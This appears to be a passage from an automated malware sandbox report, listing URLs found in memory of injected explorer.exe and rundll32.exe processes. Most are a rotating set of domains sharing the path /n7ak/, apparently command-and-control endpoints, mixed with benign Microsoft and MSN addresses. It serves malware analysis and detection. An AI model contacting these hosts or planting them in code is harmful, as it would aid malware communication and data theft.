Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.395boulderbrookdr.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.395boulderbrookdr.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.395boulderbrookdr.com/n7ak/www.volkovastyu.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.395boulderbrookdr.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ancientshadowguilt.space
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ancientshadowguilt.space/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ancientshadowguilt.space/n7ak/www.maximsboutique.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ancientshadowguilt.spaceReferer:
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gameofgem.com
Source: explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gameofgem.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gameofgem.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.goodstuff.tv
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.goodstuff.tv/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.goodstuff.tv/n7ak/www.thehandycrewcompany.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.goodstuff.tvReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jam-nins.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jam-nins.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jam-nins.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maximsboutique.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maximsboutique.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maximsboutique.com/n7ak/www.tuktukwines.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maximsboutique.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.parkpeninsula.online
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.parkpeninsula.online/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.parkpeninsula.online/n7ak/www.395boulderbrookdr.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.parkpeninsula.onlineReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.playdoapp.online
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.playdoapp.online/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.playdoapp.online/n7ak/www.taxuw.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.playdoapp.onlineReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdnaqianchuan.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdnaqianchuan.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.online
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdnaqianchuan.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supremeajock.biz
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supremeajock.biz/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supremeajock.biz/n7ak/www.1690.biz
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supremeajock.bizReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxuw.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxuw.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxuw.com/n7ak/www.jam-nins.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxuw.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehandycrewcompany.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehandycrewcompany.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehandycrewcompany.com/n7ak/www.tripskorea.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehandycrewcompany.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tripskorea.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tripskorea.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tripskorea.com/n7ak/www.gameofgem.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tripskorea.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuktukwines.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuktukwines.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuktukwines.com/n7ak/www.playdoapp.online
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuktukwines.comReferer:
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.volkovastyu.com
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.volkovastyu.com/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.volkovastyu.com/n7ak/www.goodstuff.tv
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.volkovastyu.comReferer:
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000003.3081808656.0000000008DAD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000002.3757784608.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000002.3754644999.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000008.00000002.3757784608.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
